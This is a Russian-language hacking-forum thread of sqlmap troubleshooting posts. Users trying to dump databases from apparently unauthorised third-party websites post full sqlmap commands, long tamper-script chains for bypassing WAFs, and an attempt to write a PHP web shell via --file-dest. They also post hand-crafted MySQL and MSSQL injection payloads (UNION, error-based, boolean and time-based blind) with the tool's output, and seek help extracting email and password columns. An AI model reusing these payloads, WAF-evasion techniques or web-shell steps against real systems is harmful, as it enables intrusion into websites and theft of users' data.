Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. dddg33

    dddg33 New Member

    Joined:
    28 Mar 2021
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    После
    Code:
    --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
    Выдал

    Code:
    [01:16:41] [CRITICAL] unable to retrieve the tables for any database
    [01:16:41] [WARNING] HTTP error codes detected during run:
    414 (Request-URI Too Long) - 4 times, 500 (Internal Server Error) - 1 times, 400 (Bad Request) - 1 times, 404 (Not Found) - 8 times
    [01:16:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
    Как можно обойти waf ?
    Заранее спасибо!
     
  2. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    64
    Likes Received:
    5
    Reputations:
    0
    ни как не могу дампит table_names, пробовал --hex, --no-cast tamper scripts

    Code:
    
    [05:46:09] [INFO] fetching tables for database: 'ar_new'
    [05:46:09] [INFO] fetching number of tables for database 'ar_new'
    you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
    [05:46:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [05:46:10] [INFO] retrieved:
    [05:46:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [05:46:11] [WARNING] unable to retrieve the number of tables for database 'ar_new'
    [05:46:11] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] N
    No tables found
    [05:46:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sayt.com'
    
    
     
  3. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    55
    Likes Received:
    5
    Reputations:
    0

    а есть где то полный мануал от тебя ?
     
  4. Juiseppe

    Juiseppe New Member

    Joined:
    16 Feb 2020
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Кто нибудь мапом обходил Imunify360 (CloudLinux) waf ?
     
  5. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    233
    Likes Received:
    778
    Reputations:
    208
    Ошибка на отрицательный лимит
     
    #1125 Baskin-Robbins, 8 May 2021
    Last edited: 9 May 2021
    seostock likes this.
  6. matthhy

    matthhy New Member

    Joined:
    16 Feb 2017
    Messages:
    57
    Likes Received:
    0
    Reputations:
    0
    Подскажите, пожалуйста, отсканировал сайт Acunetix, нашел sql уязвимость, но sqlmap не может пробить ее, думаю из-за WAF. Как понять, какой tamper использовать, или же как вытащить необходимую информацию для sqlmap из Acunetix?
     
  7. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    239
    Likes Received:
    440
    Reputations:
    142
    Это не много не так работает. Сначала необходимо раскрутить уязвимость самому, а потом автоматизировать процесс средствами sqlmap. Соответственно, что бы понять какой тампер использовать - раскрути сначала руками.
     
    K800 and Svan like this.
  8. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Пытаюсь сдампить данные и вот уже почти час у меня вот такое:
    [INFO] fetching entries of column(s) 'email,passwort' for table....
    Без каких либо движений. Может быть такое,что sqlmap долго считает колличество строк,если база большая?
     
  9. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    190
    Likes Received:
    4
    Reputations:
    0
    sql на магенто
    /result/?q=1'
    Акунетикс нашел sql даже выдернур имя БД

    Code:
    Proof of Exploit
    SQL query - SELECT database()
    
    admin8sasdasd
    При отправке через бурп
    site/result/?q=1'
    Ответ:

    Code:
    HTTP/1.1 503 Service Unavailable
    <pre>SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1<br />
    <strong>Trace:</strong>
    <p>Error log record number:
    <address class="copyright">Magento is a trademark of Magento Inc. Copyright &copy; 2010 Magento Inc.</address>
    Но при попытки крутануть мапом! Не видит скулю(
    Пробывал --text-only

    Может какой темпер есть под магенто?
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    879
    Reputations:
    859
    Тут надо руками смотреть, на что срабатывает эррор и руками под это дело подгонять уже тампер.
     
    _________________________
    joelblack likes this.
  11. Рамос

    Рамос Member

    Joined:
    30 Oct 2009
    Messages:
    123
    Likes Received:
    7
    Reputations:
    1
    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --current-user
    Code:
    [INFO] retrieved: 'root@localhost'
    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --file-write=C:/shell/shell.txt --file-dest=/var/www/shell.php

    >>Не льет, хотя права есть

    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --sql-shell

    select user()
    Code:
    [INFO] retrieved: 'root@localhost'
    select 'test' into outfile '/var/www/test.txt'
    Code:
    [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
    
    Что можно попробовать? Или в error-based inj не выполняется into outfile ? load_file работает
     
    #1131 Рамос, 11 Jul 2021
    Last edited: 11 Jul 2021
  12. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    233
    Likes Received:
    778
    Reputations:
    208
    Привилегии типа FILE != правам на запись в директорию
    +
    вы не показали привилегии юзера, root@localhost не обязательно рутовый пользователь мускула,
    но я думаю вы это знаете.

    По идее должен, так как юнион, еррор и тд различаются по способу получения инфы, т.е. один и тот же запрос
    может быть и union и error и time-based и blind и stack queries, правда это относится не ко всем запросам и субд.

    Правда мне не совсем понятно, почему отработал первый запрос, но ошибка на второй, ну да ладно.
    +

    В вашем случае можно попробовать залить файл в другие директории, либо поискать другой вектор.
     
    #1132 Baskin-Robbins, 12 Jul 2021
    Last edited: 12 Jul 2021
    Рамос and seostock like this.
  13. Рамос

    Рамос Member

    Joined:
    30 Oct 2009
    Messages:
    123
    Likes Received:
    7
    Reputations:
    1
    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --privileges -U CU
    Code:
    [23:12:06] [INFO] fetching current user
    [23:12:07] [INFO] retrieved: 'root@localhost'
    
    [*] 'root'@'localhost' (administrator) [28]:
        privilege: ALTER
        privilege: ALTER ROUTINE
        privilege: CREATE
        privilege: CREATE ROUTINE
        privilege: CREATE TABLESPACE
        privilege: CREATE TEMPORARY TABLES
        privilege: CREATE USER
        privilege: CREATE VIEW
        privilege: DELETE
        privilege: DROP
        privilege: EVENT
        privilege: EXECUTE
        privilege: FILE
        privilege: INDEX
        privilege: INSERT
        privilege: LOCK TABLES
        privilege: PROCESS
        privilege: REFERENCES
        privilege: RELOAD
        privilege: REPLICATION CLIENT
        privilege: REPLICATION SLAVE
        privilege: SELECT
        privilege: SHOW DATABASES
        privilege: SHOW VIEW
        privilege: SHUTDOWN
        privilege: SUPER
        privilege: TRIGGER
        privilege: UPDATE
    @@secure_file_priv
    Code:
    sqlmap.py -r test.txt  --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
    [23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
    [23:18:45] [INFO] resumed: ' '
    select @@secure_file_priv: ' '
    --technique=E
    Code:
    sqlmap.py -r test.txt  --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E
    
    [23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
    --technique=B
    Code:
    sqlmap.py -r test.txt  --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B
    
    [23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
    С правами все нормально, не могу понять только почему не выполняется into outfile
     
    #1133 Рамос, 12 Jul 2021
    Last edited: 12 Jul 2021
  14. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    233
    Likes Received:
    778
    Reputations:
    208
    ну для начала стоит поставить точку с запятой в последние запросы)) хотя мб в склмап это не нужно,
    давно не юзал.
    +
    https://github.com/sqlmapproject/sqlmap/issues/619
    Вообще ошибка на stacked queries, а в мускуле таких инъекций нет,
    не знаю, я бы включил verbose на максимум, попробовал руками.
    Больше, наверное, ничем не смогу помочь.
     
    #1134 Baskin-Robbins, 13 Jul 2021
    Last edited: 13 Jul 2021
    Рамос and seostock like this.
  15. Рамос

    Рамос Member

    Joined:
    30 Oct 2009
    Messages:
    123
    Likes Received:
    7
    Reputations:
    1
    Тогда уже тут я бессылен. Либо нужно идти в другую тему или забить)

    SELECT user();
    qwe' AND EXTRACTVALUE(2410,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(user() AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'Elwc'='Elwc
    Code:
    General error: 1105 XPATH syntax error: '\qjpjqroot@localhostqvbzq'

    SELECT 123 INTO OUTFILE '/tmp/test.txt';

    qwe' AND EXTRACTVALUE(4149,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'DLgP'='DLgP

    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71))' at line 1
    qwe' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x617364 ELSE 0x28 END)) AND 'yCEr'='yCEr

    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x61736' at line 1
    qwe' LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -
    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -')' at line 1
     
    #1135 Рамос, 13 Jul 2021
    Last edited: 14 Jul 2021
  16. birdborn

    birdborn New Member

    Joined:
    15 Jul 2021
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    IIS/dbms:mssql
    boolean-based blind/error-based
    1. при technique=B --is-dba=true при technique=E --is-dba=false. почему?
    2. при выводе таблиц (technique=E) [WARNING] the SQL query provided does not return any output(с выводом бд все норм) common-tables выручает, но так как сайт самопис находит только 5 таблиц.
    как заставить скульмап вывести таблицы ?:rolleyes:

    Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)
    Payload: cat=-5625) OR 3972=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3972=3972) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (8607=8607
    Vector: OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')
    ---
    [INFO] fetching tables for database: db1
    [PAYLOAD] -1789
    [PAYLOAD] -6678) OR 4206=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT COUNT(db1..sysusers.name+CHAR(46)+db1..sysobjects.name AS table_name) FROM db1..sysobjects INNER JOIN db1..sysusers ON db1..sysobjects.uid=db1..sysusers.uid WHERE db1..sysobjects.xtype IN (CHAR(117),CHAR(118))),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (2349=2349
    [WARNING] the SQL query provided does not return any output
     
  17. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    427
    Likes Received:
    307
    Reputations:
    5
    С клаудом туго, в открытом доступе тамперов под него нету. Как вариант искать реальный ИП ,что не всегда у получается
     
  18. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    190
    Likes Received:
    4
    Reputations:
    0
    Code:
    Parameter: #1* (URI)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: http://' AND 7389=7389-- qoxM
    
        Vector: AND [INFERENCE]
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: http://' AND (SELECT 9965 FRO
    M (SELECT(SLEEP(5)))umCy)-- CigK
        Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE]
    ,0,[SLEEPTIME])))))[RANDSTR])
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 5 columns
        Payload: http://:80/blog/category/-2990' UNION ALL SELECT NULL
    ,NULL,NULL,NULL,CONCAT(0x716a707171,0x565a7070474f77495945716a52566b686252457372
    674b776e694f6f6877554c4b564f4b6a4c464a,0x716a7a7071)-- -
        Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY]-- -
    ---
    [06:15:30] [INFO] testing MySQL
    [06:15:30] [DEBUG] performed 0 queries in 0.02 seconds
    [06:15:30] [INFO] confirming MySQL
    [06:15:30] [DEBUG] performed 0 queries in 0.00 seconds
    [06:15:30] [PAYLOAD] -8917' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
    7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
    1)-- -
    [06:15:32] [DEBUG] turning off NATIONAL CHARACTER casting
    [06:15:32] [PAYLOAD] -8379' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
    7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
    1)-- -
    [06:15:34] [DEBUG] performed 2 queries in 4.32 seconds
    [06:15:34] [DEBUG] performed 0 queries in 0.01 seconds
    [06:15:34] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx
    back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
    [06:15:34] [INFO] fetching tables for database: 'DB'
    [06:15:34] [PAYLOAD] -9852' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
    7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM INFO
    RMATION_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
    [06:15:37] [PAYLOAD] -6604' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
    7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM INFORMATION
    _SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
    [06:15:40] [WARNING] the SQL query provided does not return any output
    [06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
    ed to try a switch '--no-cast' or switch '--hex'
    [06:15:40] [PAYLOAD] -6180' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
    7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM mysq
    l.innodb_table_stats WHERE database_name IN (0x70617266756d)-- -
    [06:15:43] [PAYLOAD] -8023' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
    7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM mysql.innod
    b_table_stats WHERE database_name IN (0x70617266756d)-- -
    [06:15:45] [WARNING] the SQL query provided does not return any output
    [06:15:45] [INFO] fetching number of tables for database 'DB'
    [06:15:45] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
    S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
    1,1))>51-- ZVRv
    [06:15:48] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
    S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
    1,1))>48-- ZVRv
    [06:15:51] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
    S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
    1,1))>9-- ZVRv
    [06:15:52] [INFO] retrieved:
    [06:15:52] [DEBUG] performed 3 queries in 6.77 seconds
    multi-threading is considered unsafe in time-based data retrieval. Are you sure
    of your choice (breaking warranty) [y/N] N
    [06:15:52] [DEBUG] used the default behavior, running in batch mode
    [06:15:52] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
    SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
    ES WHERE table_schema=0x70617266756d),1,1))>51,0,5)))))HoOT)-- oDuA
    [06:15:52] [WARNING] time-based comparison requires larger statistical model, pl
    ease wait..................... (done)
    [06:16:00] [CRITICAL] considerable lagging has been detected in connection respo
    nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
     more)
    [06:16:01] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
    SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
    ES WHERE table_schema=0x70617266756d),1,1))>48,0,5)))))HoOT)-- oDuA
    [06:16:01] [WARNING] it is very important to not stress the network connection d
    uring usage of time-based payloads to prevent potential disruptions
    [06:16:02] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
    SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
    ES WHERE table_schema=0x70617266756d),1,1))>9,0,5)))))HoOT)-- oDuA
    [06:16:03] [INFO] retrieved:
    [06:16:03] [DEBUG] performed 3 queries in 11.19 seconds
    [06:16:03] [WARNING] unable to retrieve the number of tables for database 'parfu
    m'
    [06:16:03] [INFO] fetching number of tables for database 'DB'
    [06:16:03] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
    S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
    1,1))>51-- LERK
    [06:16:05] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
    S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
    1,1))>48-- LERK
    [06:16:06] [DEBUG] turning off reflection removal mechanism (for optimization pu
    rposes)
    [06:16:06] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
    S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
    1,1))>9-- LERK
    [06:16:07] [INFO] retrieved:
    [06:16:07] [DEBUG] performed 3 queries in 3.66 seconds
    [06:16:07] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
    SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
    s WHERE database_name=0x70617266756d),1,1))>51,0,5)))))FEKR)-- xICj
    [06:16:08] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
    SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
    s WHERE database_name=0x70617266756d),1,1))>48,0,5)))))FEKR)-- xICj
    [06:16:09] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
    SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
    s WHERE database_name=0x70617266756d),1,1))>9,0,5)))))FEKR)-- xICj
    [06:16:10] [INFO] retrieved:
    [06:16:10] [DEBUG] performed 3 queries in 3.23 seconds
    [06:16:10] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] N
    [06:16:10] [DEBUG] used the default behavior, running in batch mode
    No tables found
     
  19. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    48
    Likes Received:
    4
    Reputations:
    0
    Code:
    [06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
    ed to try a switch '--no-cast' or switch '--hex'
    попробуй в начале с этого + уже имеющиеся тамперы, в том числе на select. Указывай verbose 3 и смотри
     
  20. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    190
    Likes Received:
    4
    Reputations:
    0
    не помогло(
     
Loading...